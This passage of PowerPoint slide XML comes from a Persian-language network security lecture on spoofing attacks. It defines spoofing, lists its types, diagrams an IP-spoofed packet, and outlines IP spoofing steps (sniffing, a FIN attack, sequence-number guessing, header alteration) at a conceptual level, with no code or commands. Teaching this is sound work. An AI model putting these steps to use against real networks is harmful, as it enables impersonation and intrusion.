              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t>پيوست 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t>پيوست 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="6508750"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AF609A56-AC5A-4F35-9CD4-7517B1924DD8}" type="slidenum">
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:pPr/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull/>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fa-IR" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>حمله جعل</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195"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endParaRPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t>به حملاتي اطلاق مي شود که فرد يا مرکزي خود را به جاي افراد يا مراکز قابل اطمينان معرفي نموده و از اين طريق سعي در ايجاد ارتباط با اهداف مورد  نظر در جهت رسيدن به اطلاعات و يا منابع دلخواه دارد.</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5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="6356350"/>
            <a:ext cx="2133600" cy="365125"/>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defRPr/>
            </a:pPr>
            <a:fld id="{AF609A56-AC5A-4F35-9CD4-7517B1924DD8}" type="slidenum">
              <a:rPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">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fa-IR" smtClean="0"/>
              <a:t>انواع حملات جعل</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>IP Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ARP Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>DNS Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Email Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Web Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="6356350"/>
            <a:ext cx="2133600" cy="365125"/>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defRPr/>
            </a:pPr>
            <a:fld id="{AF609A56-AC5A-4F35-9CD4-7517B1924DD8}" type="slidenum">
              <a:rPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">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219200" y="152400"/>
            <a:ext cx="7620000" cy="762000"/>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a:r>
              <a:rPr lang="en-US" altLang="ja-JP" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>IP Spoofing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11268" name="Picture 3" descr="pc"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="4572000"/>
            <a:ext cx="796925" cy="663575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11269" name="Oval 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="1676400"/>
            <a:ext cx="1066800" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF99"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>sender</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11270" name="Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="2438400"/>
            <a:ext cx="1874838" cy="1968500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1181"/>
              <a:gd name="T1" fmla="*/ 0 h 1240"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1181"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 1240"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1181"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 1240"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1181"/>
              <a:gd name="T10" fmla="*/ 0 h 1240"/>
              <a:gd name="T11" fmla="*/ 1181 w 1181"/>
              <a:gd name="T12" fmla="*/ 1240 h 1240"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="1181" h="1240">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="172" y="123"/>
                  <a:pt x="883" y="528"/>
                  <a:pt x="1032" y="735"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1181" y="942"/>
                  <a:pt x="924" y="1135"/>
                  <a:pt x="895" y="1240"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11271" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5029200" y="2895600"/>
            <a:ext cx="1143000" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11272" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1993409">
            <a:off x="3429000" y="2681288"/>
            <a:ext cx="1974850" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>ip spoofed packet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11273" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191000" y="5181600"/>
            <a:ext cx="768350" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9900"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11274" name="Picture 9" descr="pc"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5976938" y="1858963"/>
            <a:ext cx="796925" cy="663575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11275" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5873750" y="2438400"/>
            <a:ext cx="908050" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>partner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 11"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="1979872">
            <a:off x="3048000" y="2971800"/>
            <a:ext cx="1752600" cy="609600"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1104" cy="384"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11278" name="Rectangle 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2112" y="1824"/>
              <a:ext cx="1104" cy="192"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP">
                  <a:cs typeface="ＭＳ Ｐゴシック"/>
                </a:rPr>
                <a:t>dst: victim</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11279" name="Rectangle 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2112" y="1632"/>
              <a:ext cx="1104" cy="192"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP">
                  <a:cs typeface="ＭＳ Ｐゴシック"/>
                </a:rPr>
                <a:t>src: partner</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11277" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="4724400"/>
            <a:ext cx="2514600" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 67931"/>
              <a:gd name="adj2" fmla="val -41986"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Oh, my partner sent me a packet. I’ll process this.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="6356350"/>
            <a:ext cx="2133600" cy="365125"/>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defRPr/>
            </a:pPr>
            <a:fld id="{AF609A56-AC5A-4F35-9CD4-7517B1924DD8}" type="slidenum">
              <a:rPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">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fa-IR" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>مراحل کار در  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>IP Spoofing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291"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fa-IR" dirty="0" smtClean="0"/>
              <a:t>بدست آوردن </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t> هدف و</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t> کامپيوتر مورد اعتماد آن</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sniff </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t> اطلاعات مبادله شده بين اين دو</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t>قطع ارتباط آن ها از طريق </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FIN Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>حدس </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Sequence Number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t>تغيير در سرايند بسته </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fa-IR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="6356350"/>
